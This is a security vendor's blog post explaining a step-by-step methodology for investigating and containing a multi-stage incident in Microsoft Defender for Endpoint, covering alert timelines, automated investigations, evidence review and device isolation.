Investigating with Microsoft Defender for Endpoints (MDE)
Use a focused methodology to resolve multi-stage incidents quickly and effectively
Microsoft Defender for Endpoints (MDE) uses AI and analytics to correlate alerts to create an incident, and it is not shy about showing all the alerts that could potentially be involved with the incident. If a security analyst expands a multistage incident, they may see a long and multi-colored list filled with alerts of varying complexity.
The amount of information the platform can give an analyst can seem overwhelming, but fear not. If an analyst understands how to use the MDE platform effectively, they will be able to create a manageable timeline for multi-stage incidents like this.
In this blog, we show how an analyst can go over the multi-stage incident in the example image using the investigation phase of CyberMSI’s incident management approach. By using a focused methodology, a security analyst can turn an intimidating alert list into an accessible and clear timeline.
Get a Timeline of Events in the Incident Menu
The first menu that analysts will see when opening the incident is a sortable table of alerts in the incident. The analyst can sort by time and use the columns to get an initial idea of the important questions in an investigation like “who”, “where”, and “what happened”.
Who: The “User” column shows the identity of the local user account that performed the actions that caused these alerts.
Where: The “Device” column shows where the incidents happened, and it looks like all these incidents happened on a single endpoint.
What Happened: The “Title” column has the alert names for each of the alerts in the timeline. The titles are useful for creating a basic timeline, but the analyst will need to investigate these alerts individually to get more details about what happened.
Gather More Details from the Incident Menu
There are other details in the incident menu that the analyst can add to their timeline like the automation activity and evidence found.
Automation: In the “Investigations” tab the MDE automation system “Automated Investigation and Response” had run 3 times in response to these alerts. The analyst added these automated responses to their timeline.
Evidence: In the “Evidence” tab there is a record of all the potentially malicious files and processes found during the investigation. If the analyst decides they need more information about this evidence, they can gather it using the investigation package feature in MDE.
Investigating the Individual Alert Stories
The analyst was not able to get a full picture of what happened during the incident by just looking at the alert titles, so they went to the alert menu for the alerts that they did not know enough about. In the alert menu, there is a section called the “alert story” where the analyst was able to find more specific information about the alerts. An example of one of the alerts was an encoded PowerShell command that was both unencoded and had a description of what the command did.
The analyst finished going through the alert stories and had enough information to finish their investigation. They determined that this was a medium severity true positive incident because the malicious scripts that were run throughout the incident timeline were clear signs of attempting to gain persistence and move laterally.
Containment and Mitigation Actions
This customer environment allowed the analyst to take actions on their endpoints to contain and mitigate security incidents. The analyst was able to contain the incident by isolating the device, and they were able to help with mitigation by using the “live response” feature to clean up any potentially malicious artifacts that the automation was unable to remove.
We will continue to share best practices and lessons learned in future posts on using Microsoft Defender for Endpoints in customer environments. The EDR landscape may continue to evolve, but the underlying methodology will always be useful for breaking down complex incidents during investigations.
In closing, consider these three questions when using the Microsoft Defender for Endpoints in your organization:
- Do we have an effective methodology for breaking down long multi-staged incidents?
- Are we using timelines to organize our incident investigations or are we “just winging it”?
- Would we be able to respond to a multi-stage incident like this one using the tools in MDE after the investigation is done?